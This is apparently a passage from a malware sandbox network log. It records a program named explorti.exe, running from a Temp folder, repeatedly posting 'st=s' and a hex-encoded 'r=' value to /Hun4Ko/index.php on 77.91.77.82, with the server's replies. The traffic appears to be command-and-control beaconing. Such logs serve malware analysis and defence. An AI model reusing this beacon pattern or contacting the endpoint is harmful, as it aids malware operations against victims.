                                                                Jul 5, 2024 04:24:40.783269882 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:41.503307104 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                105192.168.2.44984877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:41.515055895 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:42.211369038 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                106192.168.2.44984977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:42.327579021 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:43.034066916 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                107192.168.2.44985077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:43.041984081 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:43.751257896 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                108192.168.2.44985177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:43.872158051 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:44.590300083 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                109192.168.2.44985277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:44.599782944 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:45.296391964 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                110192.168.2.44985377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:45.418724060 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:46.119465113 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                111192.168.2.44985477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:46.127119064 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:46.835016012 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                112192.168.2.44985577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:46.949704885 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:47.692666054 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                113192.168.2.44985677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:47.703306913 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:48.399470091 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                114192.168.2.44985777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:48.513119936 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:49.231018066 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                115192.168.2.44985877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:49.239522934 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:49.950884104 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                116192.168.2.44985977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:50.076112032 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:50.786679983 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                117192.168.2.44986077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:50.799576044 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:51.516417027 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                118192.168.2.44986177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:51.647334099 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:52.345113993 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                119192.168.2.44986277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:52.354271889 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:53.058583021 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                120192.168.2.44986377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:53.184231997 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:53.888694048 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                121192.168.2.44986477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:53.897550106 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:54.596714020 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                122192.168.2.44986577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:54.715965033 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:55.452366114 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                123192.168.2.44986677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:55.478894949 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:56.192886114 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                124192.168.2.44986777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:56.309575081 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:57.012932062 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                125192.168.2.44986877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:57.021064043 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
